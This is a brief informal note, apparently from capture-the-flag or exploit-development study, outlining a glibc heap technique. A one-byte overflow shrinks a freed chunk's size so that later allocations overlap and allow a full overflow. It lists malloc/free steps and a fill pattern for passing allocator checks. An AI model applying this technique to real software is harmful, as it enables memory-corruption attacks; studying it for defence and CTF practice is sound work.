For This method to work
- U just need to have single byte overflow over the size metadata of the chunk
-
malloc( overflowing_chunk )
-
malloc(0x220) # chunk that is going to be shrinked
-
Make sure u fill it with "A"*0x1f0+pack(0x200)+"B"x40 , so that it passes the
prevsize (next_chunk) == size
check
(NOTE :"A"*0x1f0 coz we are filling from (p+0x10), this check is done in malloc-->unlink-->check)
-
malloc( 0x100 ) # the chunk going to be fooled C
-
free ( 2'nd chunk )
-
Overflow the second chunk , now size = 0x200 , but 3'rd still thinks that it's size is 0x230 coz the prev size will not be updated
-
malloc (0x100) # b1
-
malloc(x) # This the chunk u can overflow completely
-
malloc(y) # the wall
-
free(b1)
-
free(c)
-
malloc(0x300) # voila magic chunk which allows us to overflow